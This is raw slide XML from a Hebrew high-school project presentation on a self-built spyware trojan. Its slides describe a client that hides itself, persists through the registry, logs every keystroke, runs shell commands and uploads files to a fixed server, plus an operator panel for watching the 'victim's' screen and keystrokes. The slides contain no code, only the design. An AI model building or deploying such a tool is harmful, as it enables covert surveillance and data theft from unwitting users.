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86" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="261" r:id="rId8"/>
    <p:sldId id="264" r:id="rId9"/>
    <p:sldId id="266" r:id="rId10"/>
    <p:sldId id="285" r:id="rId11"/>
    <p:sldId id="267" r:id="rId12"/>
    <p:sldId id="269" r:id="rId13"/>
    <p:sldId id="271" r:id="rId14"/>
    <p:sldId id="273" r:id="rId15"/>
    <p:sldId id="274" r:id="rId16"/>
    <p:sldId id="275" r:id="rId17"/>
    <p:sldId id="276" r:id="rId18"/>
    <p:sldId id="277" r:id="rId19"/>
    <p:sldId id="279" r:id="rId20"/>
    <p:sldId id="280" r:id="rId21"/>
    <p:sldId id="281" r:id="rId2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595" autoAdjust="0"/>
    <p:restoredTop sz="94660"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="42" d="100"/>
          <a:sy n="42" d="100"/>
        </p:scale>
        <p:origin x="-1302"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46431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369070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117452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116887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401513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414221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215052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125695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371093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296869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001A692-BC96-46AE-A875-9CF224C7E83F}" type="datetimeFigureOut">
              <a:rPr lang="he-IL" smtClean="0"/>
              <a:pPr/>
              <a:t>כ"ה/ניסן/תשע"ב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147334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001A692-BC96-46AE-A875-9CF224C7E83F}" type="datetimeFigureOut">
              <a:rPr lang="he-IL" smtClean="0"/>
              <a:pPr/>
              <a:t>כ"ה/ניסן/תשע"ב</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72274CC-D284-497F-8179-CA4D8696E422}" type="slidenum">
              <a:rPr lang="he-IL" smtClean="0"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="he-IL"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="789952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deproject.com/KB/cs/globalhook.aspx" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://msdn.microsoft.com/en-us/library/aa187917.aspx" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.esnips.com/web/CSharpSamples" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.corner.co.il/index.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819570" y="0"/>
            <a:ext cx="7324441" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL"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t>מדעי המחשב </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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br>
            <a:r>
              <a:rPr lang="he-IL"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t>              אקדמיה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US"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br>
            <a:r>
              <a:rPr lang="he-IL" sz="5400" b="1" cap="none" spc="0"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t>                         ותע</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="5400" b="1" dirty="0" smtClean="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rPr>
              <a:t>שייה</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="5400" b="1" cap="none" spc="0" dirty="0">
              <a:ln w="17780" cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:effectLst>
                <a:outerShdw blurRad="50800" algn="tl" rotWithShape="0">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2857496"/>
            <a:ext cx="9144000" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>נושא </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>העבודה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: תוכנת ריגול- "סוס טרויאני"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>שם התלמיד</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: ברק </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>בלוגולובסקי</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>שם </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>בית הספר</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: קריית חינוך ע"ש דוד בן גוריון בעמק חפר</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>שם המנחה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: מיכאל </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>צ'רנובילסקי</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>שם המורה המלווה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: אילנה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>חריזמן</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>תאריך</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>: 26/3/12</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
              <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="תמונה 3" descr="סוס1.jpg"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:duotone>
              <a:prstClr val="black"/>
              <a:schemeClr val="tx2">
                <a:tint val="45000"/>
                <a:satMod val="400000"/>
              </a:schemeClr>
            </a:duotone>
            <a:lum bright="19000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm rot="18736538">
            <a:off x="432098" y="4639968"/>
            <a:ext cx="1714488" cy="1714488"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="50800" dir="5400000" algn="ctr" rotWithShape="0">
              <a:schemeClr val="accent1">
                <a:lumMod val="40000"/>
                <a:lumOff val="60000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="846529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b="1" dirty="0" smtClean="0">
                <a:latin typeface="Miriam" pitchFamily="34" charset="-79"/>
                <a:cs typeface="Miriam" pitchFamily="34" charset="-79"/>
              </a:rPr>
              <a:t>מודולים-לקוח</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a:xfrm>
            <a:off x="457200" y="1600201"/>
            <a:ext cx="8229600" cy="3829064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>rVictimFom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t>– יורשת מהמחלקה </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t> מחלקה הראשית, מקבלת את הפקודות מהשרת ומבצעת אותם/ קוראת למחלקות שיבצעו אותם, דואגת להסתיר את הטופס ולהתחבר לשרת באופן אוטומטי ע"י </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" err="1"/>
              <a:t>אייפי</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>קבוע, משתמשת בפעולות מתוך </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>user32.dll</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>AI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t>– מחלקה אשר רושמת את הקובץ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" err="1"/>
              <a:t>ברג'יסרי</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t>, מקבלת את כל הקלטים מהמקלדת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" err="1"/>
              <a:t>ומכינסה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t> אותם לקובץ ומודדת כמה זמן המשתמש משתמש במחשבו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Cproces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t>– מחלקה אשר מכילה תהליך לשורת הפקודה ומבצעת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>אותו</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>upload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0"/>
              <a:t>– מחלקה אשר מעבירה לשרת קבצים</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2400" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="4036433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lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="תמונה 3"/>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556792"/>
            <a:ext cx="3312368" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="1556792"/>
            <a:ext cx="4248472" cy="4678204"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>לחיצה על </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> תחבר את השרת לקורבן, הקורבן יופיע בטבלה ולידו כפתור רדיו, יהיה אפשר לסמן אותו ולשלוח לו הודעה על כיבוי, ולאחר מכאן הודעה על ביטול הכיבוי, הטבלה הינה ארוכה כיוון שמתוכנן בעתיד שתהיה אפשרות להתחבר לכמה מחשבים.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3778909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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="מציין מיקום תוכן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55576" y="1700808"/>
            <a:ext cx="3528392" cy="2952328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4499992" y="1556792"/>
            <a:ext cx="4320480" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>לחיצה על כפתור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>watch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> תציג את מסך הקורבן ותגרום להופעת כפתור נוסף (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>fullwatch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>) שדרכו יהיה אפשר לראות את המסך בגודל מלא. לחיצה על כפתור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>stop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> תעצור את הצפייה, ולחיצה על כפתור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>esc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> במקלדת תעצור את הצפייה במסך המלא.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="164159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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="מציין מיקום תוכן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8963" y="1600201"/>
            <a:ext cx="3475086" cy="3124944"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5148064" y="1628800"/>
            <a:ext cx="3744416" cy="4247317"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t>לחיצה על כפתור </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>start spying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> תתחיל את פעולה הריגול, יופיעו כל </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" err="1"/>
              <a:t>ההקלדות</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> של הקורבן. בנוסף אפשר להריץ חיפוש ע"י כתיבת מילה לחיפוש ולחיצה על הכפתור והתוצאה תתקבל מתחת.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="1999624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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="מציין מיקום תוכן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15785" y="1600201"/>
            <a:ext cx="6152559" cy="3412976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1000100" y="5877272"/>
            <a:ext cx="6668244" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="1">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>ניתן לשלוח לקורבן הודעה ע"י לחיצה על </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>send</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" xmlns="" val="3343551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25000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr rtl="0"/>
